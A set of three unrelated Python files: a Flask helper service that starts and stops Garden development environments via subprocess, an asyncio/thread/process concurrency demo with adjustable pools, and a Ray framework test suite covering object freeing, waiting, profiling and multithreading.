# stderr=subprocess.PIPE
# )
# return 'ok'
@app.route('/merge', methods=['GET'])
def merge():
commit_message = urllib.parse.unquote(request.args.get('commit_message'))
app.logger.info('/merge called with commit message: %s', commit_message)
subprocess.Popen(['sudo', '-i', '-u', 'jovyan', 'merge.sh', commit_message],
cwd='/home/jovyan',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
return 'ok'
has_garden_started = False
messages = []
has_garden_deleted = False
@app.route('/garden-status', methods=['GET'])
@cross_origin()
def garden_status():
return jsonify({
'ready': has_garden_started,
'messages': messages
})
@app.route('/garden-delete-status', methods=['GET'])
@cross_origin()
def garden_delete_status():
return jsonify({
'ready': has_garden_deleted,
'messages': messages
})
@app.route('/delete-garden', methods=['GET'])
@cross_origin()
def delete_garden():
app.logger.info('/delete-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name
p = subprocess.Popen(['/root/.garden/bin/garden', 'delete', 'environment', '--logger-type=json'],
cwd='/home/jovyan/work',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_deleted
global messages
has_garden_deleted = False
messages = []
def do_work():
global has_garden_deleted
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
if r['msg'] == 'Deleting namespaces':
has_garden_deleted = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_work)
thread.start()
return 'ok'
# method must be GET when using SSE
@app.route('/stop-garden', methods=['GET'])
@cross_origin()
def stop_garden():
app.logger.info('/stop-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name
p = subprocess.Popen(['/root/.garden/bin/garden', 'delete', 'environment', '--logger-type=json'],
cwd='/home/jovyan/work',
# have it covered in supervisord config, otherwise need this
# for garden/kubectl to find the kube config
# env={
# 'USER': 'root',
# 'HOME': '/root',
# 'KUBECONFIG': '/root/.kube/config'
# }
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_deleted
global messages
has_garden_deleted = False
messages = []
def do_delete():
global has_garden_deleted
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
msg = r.get('msg', None)
if msg is not None:
m = msg.lower()
if 'aborting' in m:
# raise Exception('No enabled modules found in project.')
raise Exception(messages[-2])
elif 'deleting namespaces' in m:
has_garden_deleted = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_delete)
thread.start()
return 'ok'
# method must be GET when using SSE
@app.route('/start-garden', methods=['GET'])
@cross_origin()
def start_garden():
app.logger.info('/start-garden called')
repo_name = urllib.parse.unquote(request.args.get('repo_name'))
os.environ['REPO_NAME'] = repo_name
p = subprocess.Popen(['/root/.garden/bin/garden', 'dev', '--logger-type=json'],
cwd='/home/jovyan/work',
# have it covered in supervisord config, otherwise need this
# for garden/kubectl to find the kube config
# env={
# 'USER': 'root',
# 'HOME': '/root',
# 'KUBECONFIG': '/root/.kube/config'
# }
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
global has_garden_started
global messages
has_garden_started = False
messages = []
def do_work():
global has_garden_started
while p.poll() is None:
try:
line = p.stdout.readline()
line = line.decode(sys.stdout.encoding).strip('\x00')
app.logger.debug(line)
r = json.loads(line)
messages.append(r)
msg = r.get('msg', None)
if msg is not None:
m = msg.lower()
if 'aborting' in m:
# raise Exception('No enabled modules found in project.')
raise Exception(messages[-2])
elif 'waiting for code changes' in m:
has_garden_started = True
break
except:
app.logger.error('Unexpected error: %s', sys.exc_info()[0])
thread = Thread(target=do_work)
thread.start()
return 'ok'
# TODO
# def event_stream():
# while p.poll() is None:
# line = p.stdout.readline()
# line = line.decode(sys.stdout.encoding).strip('\x00')
# app.logger.debug(line)
# yield 'data: {}\n\n'.format(line)
# return Response(event_stream(), mimetype='text/event-stream', headers={
# 'Content-Type': 'text/event-stream',
# 'Cache-Control': 'no-cache',
# 'X-Accel-Buffering': 'no'
# })
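# A hypothetical client-side sketch (not part of this app): /start-garden kicks
# off the long-running `garden dev` process in a background thread, and a caller
# is expected to poll /garden-status until it reports ready. The base URL, repo
# name and the use of the `requests` library below are assumptions.
#
# import time
# import requests
#
# def wait_for_garden(base_url='http://localhost:5000', repo_name='my-repo'):
#     requests.get(base_url + '/start-garden', params={'repo_name': repo_name})
#     while True:
#         status = requests.get(base_url + '/garden-status').json()
#         if status['ready']:
#             return status['messages']
#         time.sleep(2)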
|
process_threads_and_tasks_autoscale.py
|
# -*- coding: utf-8 -*-
#
# Author: Daniel Garcia (cr0hn) - @ggdaniel
#
import aiohttp
import asyncio
import random
from threading import Thread, Event, BoundedSemaphore, currentThread
from multiprocessing import Process
class ConcurrentManager:
def __init__(self, n_process=2, n_threads=5, n_tasks=10, daemon=False):
self.daemon = daemon
self.n_tasks = n_tasks
self.n_threads = n_threads
self.n_process = n_process
self.sem_threads = BoundedSemaphore(self.n_threads)
self.sem_tasks = asyncio.BoundedSemaphore(self.n_tasks)
self.running_process = []
# --------------------------------------------------------------------------
# Public methods
# --------------------------------------------------------------------------
def run(self):
self._launch_processes()
def wait_until_complete(self):
try:
for x in self.running_process:
x.join()
except KeyboardInterrupt:
print("\n[*] CTRL+C Caught. ...")
for x in self.running_process:
x.terminate()
@asyncio.coroutine
def task(self, t, e):
"""
A task
:param e: Event obj
:type e: Event
"""
# if not e.isSet():
# for x in range(100):
#
# with aiohttp.ClientSession() as session:
# res = yield from session.get('https://api.github.com/events')
#
# print(res.status)
#
# # body = yield from res.text()
#
# yield from asyncio.sleep(1)
for x in range(200):
print(t, " - ", currentThread().name, " - task-%s" % random.randint(1, 100000))
yield from asyncio.sleep(0.5)
# Thread _launch_tasks
def worker(self, name, state, sem):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
loop.run_until_complete(self._launch_coroutines(loop, name, state))
except KeyboardInterrupt:
# Canceling tasks
tasks = asyncio.Task.all_tasks()
# force evaluation of the lazy map() so every task is actually cancelled
list(map(asyncio.Task.cancel, tasks))
# wait for the cancellations to finish before closing the loop
loop.run_until_complete(asyncio.gather(*tasks, return_exceptions=True))
finally:
loop.close()
sem.release()
# --------------------------------------------------------------------------
# Private launchers
# --------------------------------------------------------------------------
# Thread pool
def _launch_threads(self, proc_number):
state = Event()
th = []
try:
while True:
if state.isSet():
break
n = "proc-%s" % proc_number
t = Thread(target=self.worker, args=(n, state, self.sem_threads, ))
th.append(t)
# t.daemon = True
t.start()
self.sem_threads.acquire()
for t in th:
t.join()
except KeyboardInterrupt:
# print("\n[*] CTRL+C Caught. Exiting threads form process '%s'..." % proc_number)
pass
finally:
state.set()
# Process pool
def _launch_processes(self):
try:
for i in range(self.n_process):
p = Process(target=self._launch_threads, args=(i,))
if self.daemon is True:
p.daemon = True
self.running_process.append(p)
p.start()
if self.daemon is False:
for x in self.running_process:
x.join()
except KeyboardInterrupt:
for x in self.running_process:
x.terminate()
# Tasks pool
@asyncio.coroutine
def _launch_coroutines(self, loop, name, state):
while True:
if state.isSet():
break
yield from self.sem_tasks.acquire()
loop.create_task(self.task(name, state))
# --------------------------------------------------------------------------
# Scalability methods
# --------------------------------------------------------------------------
@property
def threads_num(self):
"""
:return: Return the current active threads
:rtype: int
"""
return self.sem_threads._value
def threads_inc(self, n):
"""
Increases the thread pool in 'n'.
:param n: number which increment the thread pool
:type n: int
"""
self.sem_threads._value += n
if self.sem_threads._value < self.sem_threads._initial_value:
self.sem_threads.release()
def threads_dec(self, n):
"""
Decreases the threads number in 'n'
:param n: number which decrement the thread pool
:type n: int
"""
if n > 0:
if self.sem_threads._value - n > 1:
self.sem_threads._value -= n
@property
def tasks_num(self):
"""
:return: Return the current active asyncio tasks
:rtype: int
"""
return self.sem_tasks._value
def tasks_inc(self, n):
"""
Increases the asyncio tasks pool in 'n'.
:param n: number which increment the asyncio Task pool
:type n: int
"""
self.sem_tasks._value += n
if self.sem_tasks._value < self.sem_tasks._bound_value:
self.sem_tasks.release()
def tasks_dec(self, n):
"""
Decreases the asyncio Tasks number in 'n'
:param n: number which decrement the tasks pool
:type n: int
"""
if n > 0:
if self.sem_tasks._value - n > 1:
self.sem_tasks._value -= n
if __name__ == '__main__':
#
# This code builds this process -> threads -> asyncio tasks distribution:
#
# run_monitor -> Process 1 -> Thread 1.1 -> Task 1.1.1
#                                        -> Task 1.1.2
#                                        -> Task 1.1.3
#
#                          -> Thread 1.2
#                                        -> Task 1.2.1
#                                        -> Task 1.2.2
#                                        -> Task 1.2.3
#
#             -> Process 2 -> Thread 2.1 -> Task 2.1.1
#                                        -> Task 2.1.2
#                                        -> Task 2.1.3
#
#                          -> Thread 2.2
#                                        -> Task 2.2.1
#                                        -> Task 2.2.2
#                                        -> Task 2.2.3
import time
# c = ConcurrentManager(n_process=1, n_tasks=2, n_threads=2, daemon=True)
c = ConcurrentManager(n_process=4, n_tasks=20, n_threads=10)
c.run()
# time.sleep(1)
#
# print("Incrementing", "#" * 200)
# c.threads_inc(4)
#
# # time.sleep(2)
#
# c.tasks_inc(5)
# c.wait_until_complete()
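# Note: the @asyncio.coroutine / "yield from" style used above is deprecated
# (and removed in recent Python versions). A rough async/await equivalent of
# task() would look like the sketch below; illustrative only, not wired into
# ConcurrentManager.
#
# async def task(self, t, e):
#     for x in range(200):
#         print(t, " - ", currentThread().name, " - task-%s" % random.randint(1, 100000))
#         await asyncio.sleep(0.5)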
|
test_advanced.py
|
# coding: utf-8
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import random
import sys
import threading
import time
import numpy as np
import pytest
import ray
import ray.cluster_utils
import ray.test_utils
from ray.test_utils import RayTestTimeoutException
logger = logging.getLogger(__name__)
# issue https://github.com/ray-project/ray/issues/7105
def test_internal_free(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
class Sampler:
def sample(self):
return [1, 2, 3, 4, 5]
def sample_big(self):
return np.zeros(1024 * 1024)
sampler = Sampler.remote()
# Free deletes from in-memory store.
obj_ref = sampler.sample.remote()
ray.get(obj_ref)
ray.internal.free(obj_ref)
with pytest.raises(Exception):
ray.get(obj_ref)
# Free deletes big objects from plasma store.
big_id = sampler.sample_big.remote()
ray.get(big_id)
ray.internal.free(big_id)
time.sleep(1) # wait for delete RPC to propagate
with pytest.raises(Exception):
ray.get(big_id)
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
object_refs = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(object_refs)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
object_refs = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(object_refs)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ref.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ref.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ref
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ref all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_ref = f.remote()
ray.wait([object_ref])
ray.get(object_ref)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
@pytest.mark.skip(reason="TODO(ekl)")
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_refs = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_ref in object_refs:
ray.get([
f._remote(args=[object_ref], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g(): # noqa: F811
return 2
@ray.remote # noqa: F811
def g(): # noqa: F811
return 3
@ray.remote # noqa: F811
def g(): # noqa: F811
return 4
@ray.remote # noqa: F811
def g(): # noqa: F811
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectRef.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
@ray.remote
class Echo:
def echo(self, value):
return value
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor:
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
assert ray.get(actor.join.remote()) == "ok"
def test_wait_makes_object_local(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(address=cluster.address)
@ray.remote
class Foo:
def method(self):
return np.zeros(1024 * 1024)
a = Foo.remote()
# Test get makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ray.get(x_id)
assert ray.worker.global_worker.core_worker.object_exists(x_id)
# Test wait makes the object local.
x_id = a.method.remote()
assert not ray.worker.global_worker.core_worker.object_exists(x_id)
ok, _ = ray.wait([x_id])
assert len(ok) == 1
assert ray.worker.global_worker.core_worker.object_exists(x_id)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|